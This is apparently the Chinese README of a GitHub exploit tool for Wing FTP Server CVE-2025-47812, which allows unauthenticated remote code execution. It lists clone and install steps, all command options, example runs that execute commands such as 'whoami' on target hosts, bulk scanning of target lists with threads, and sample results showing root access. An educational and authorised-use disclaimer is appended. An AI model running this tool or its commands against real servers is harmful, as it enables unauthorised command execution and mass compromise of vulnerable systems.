针对 Wing FTP Server CVE-2025-47812 的增强型利用工具 - 未授权远程代码执行 (RCE)
克隆此仓库并进入目录:
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
或者直接下载 CVE-2025-47812.py 脚本并运行它。
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Exploit for Wing FTP Server CVE-2025-47812 - enhanced version
options:
-h, --help 显示此帮助信息
-u URL, --url URL 目标URL(例如 http://192.168.1.100:5466)
-f FILE, --file FILE 包含URL列表的文件(每行一个)
-c COMMAND, --command COMMAND
要执行的命令(默认: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
用户名(default: anonymous)
-P PASSWORD, --password PASSWORD
密码(default: 空)
--check 检查模式:仅检测是否易受攻击(使用无害命令)
-v, --verbose 详细模式(显示详细信息)
--proxy PROXY 代理(例如 http://127.0.0.1:8080)
--timeout TIMEOUT 超时秒数(default: 10)
-o OUTPUT, --output OUTPUT
保存结果的文件
--output-format {txt,json,csv}
输出格式(default: txt)
--threads THREADS 扫描多个目标时的线程数(default: 5)
--no-progress 隐藏进度条
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
文件应包含每行一个URL,例如:
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466
http://192.168.1.10:5466 - VULNERABLE - 用户: root
http://192.168.1.11:5466 - SEGURO - 不易受攻击
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "用户: root"
}
]
Target,Vulnerable,Info
http://192.168.1.10:5466,True,用户: root
此利用工具仅供教育目的和授权安全测试使用。未经明确同意对系统进行未经授权的使用是违法的,并可能带来严重的法律后果。作者不承担任何滥用责任。
如果你喜欢这个作品,别忘了在GitHub上点个星 ⭐!
本项目基于 MIT 许可证授权 – 详情请见 LICENSE 文件。